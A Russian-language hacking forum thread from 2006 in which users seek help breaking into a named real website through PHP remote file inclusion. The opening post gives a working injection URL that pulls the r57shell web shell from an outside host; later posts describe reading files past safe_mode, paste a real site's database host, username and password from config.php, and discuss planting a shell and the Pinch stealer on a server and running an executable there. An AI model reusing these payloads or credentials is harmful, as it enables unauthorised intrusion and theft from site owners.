Windows NT & Safe mode (php inj)

Discussion in 'Уязвимости' started by DaemoniZ, 11 Jul 2006.

  1. DaemoniZ

    DaemoniZ Member

    Joined:
    8 Jan 2006
    Messages:
    45
    Likes Received:
    9
    Reputations:
    6
    Ребят... Подскажите как ломать... Я даже php бэкдор залить немогу.

    http://www.rtk.it/SQuery/lib/gore.php?libpath=http://rst.void.ru/download/r57shell.txt?

    Пасиба =)
     
    #1 DaemoniZ, 11 Jul 2006
  2. zyl

    zyl Elder - Старейшина

    Joined:
    19 Apr 2006
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    Это по-моему не из той оперы
    Здесь ошибка вида:
    Fatal error: Class gore: Cannot inherit from undefined class gamespy in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 8

    А для загрузки шелла нужно чтобы была:
    Warning: main(libpat): failed to open stream: No such file or directory in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 13
    Warning: main(libpat): Failed opening 'libpat' for inclusion (include_path='.;/usr/local/php/PEAR') in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 1

    Может там какая то переменная висела
     
    #2 zyl, 11 Jul 2006
    Last edited: 11 Jul 2006
  3. DaemoniZ

    DaemoniZ Member

    Joined:
    8 Jan 2006
    Messages:
    45
    Likes Received:
    9
    Reputations:
    6
    Хммм... А обойти-то можно как-нибудь? Что меня достаточно сильно удивило - я не могу нормально ползать по папкам.
    Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
     
    #3 DaemoniZ, 11 Jul 2006
  4. zyl

    zyl Elder - Старейшина

    Joined:
    19 Apr 2006
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    Возможно что ошибаюсь, но по моему нет.

    Тут немного о них написанно:
    _http://www.diwaxx.ru/web/chmod.php
     
    #4 zyl, 11 Jul 2006
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Я как то читал про обход safe_mod но там жопа полная. Единсвенное чё можно пока сделать, так это читать любый файлы...(с помощью php_eval). Вот например небольшой кусок из config.php :
    $dbhost = "62.149.150.56";
    $dbuname = "Sql103994";
    $dbpass = "41ebe44d";
    $dbname = "Sql103994_1";
    $prefix = "nuke";
    $user_prefix = "nuke";
    $dbtype = "MySQL";
    $sitekey = "S·kQg*ит?^м#@и+~ю-?4Sd5%W@Y6Ђ7“ю2-dm29-.-39.3a8sUf+W9";
    $gfx_chk = 7;
    $subscription_url = "";
    $admin_file = "admin";
    $tipath = "images/topics/";
    $advanced_editor = 0;
    $display_errors = false;
     
    #5 Ch3ck, 12 Jul 2006
  6. DaemoniZ

    DaemoniZ Member

    Joined:
    8 Jan 2006
    Messages:
    45
    Likes Received:
    9
    Reputations:
    6
    Да это действительно так. Дело все в том, что я даже не знаю как ломать. Хотелось-бы бэкдор залить (просто php файлик как-нить изменить) но вот понять не могу, где я могу писать, а где - нет.

    Это про chmod. Он в *.nix системах, а в моем случае NT.
     
    #6 DaemoniZ, 12 Jul 2006
  7. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    У меня анологичное ситуация (( Свервак под NT залил шелл + пинч на комп а вот команда C:\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
     
    #7 Electro, 8 Aug 2006
  8. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Конечно не отвечаю, что выйдет, но попробуй так:
    C:\\ start [путь] x.exe
    [путь] до файла...если в этой же дире, то не надо... :cool:
     
    #8 Ch3ck, 8 Aug 2006
  9. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Попробуй второй пример в "выполнить пхп код" вставить отсюда fileperms
     
    #9 hidden, 8 Aug 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.